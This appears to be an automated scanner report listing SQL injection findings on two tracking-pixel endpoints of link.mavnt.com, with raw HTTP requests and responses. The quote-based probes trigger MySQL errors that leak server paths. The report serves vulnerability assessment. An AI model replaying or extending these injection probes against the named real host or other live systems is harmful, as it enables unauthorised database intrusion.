1.1. http://link.mavnt.com/1x1.php [51270 parameter]
1.2. http://link.mavnt.com/1x1.php [name of an arbitrarily supplied request parameter]
1.3. http://link.mavnt.com/1x1_map.php [51270 parameter]
1.4. http://link.mavnt.com/1x1_map.php [name of an arbitrarily supplied request parameter]
Severity: High
Confidence: Certain
Host: http://link.mavnt.com
Path: /1x1.php

GET /1x1.php?51270' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 682
Content-Type: text/html

<br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs Stack trace: #0 ...[SNIP]...

GET /1x1.php?51270'' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Content-Type: image/gif

GIF89a...................

Severity: High
Confidence: Certain
Host: http://link.mavnt.com
Path: /1x1.php

GET /1x1.php?1'=1 HTTP/1.1
Host: link.mavnt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 675
Connection: close
Content-Type: text/html

<br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs Stack trace: #0 /var/d ...[SNIP]...

GET /1x1.php?1''=1 HTTP/1.1
Host: link.mavnt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................

Severity: High
Confidence: Certain
Host: http://link.mavnt.com
Path: /1x1_map.php

GET /1x1_map.php?51270' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 682
Content-Type: text/html

<br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs Stack trace: #0 ...[SNIP]...

GET /1x1_map.php?51270'' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Content-Type: image/gif

GIF89a...................

Severity: High
Confidence: Certain
Host: http://link.mavnt.com
Path: /1x1_map.php

GET /1x1_map.php?1'=1 HTTP/1.1
Host: link.mavnt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 675
Connection: close
Content-Type: text/html

<br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs Stack trace: #0 /var/d ...[SNIP]...

GET /1x1_map.php?1''=1 HTTP/1.1
Host: link.mavnt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................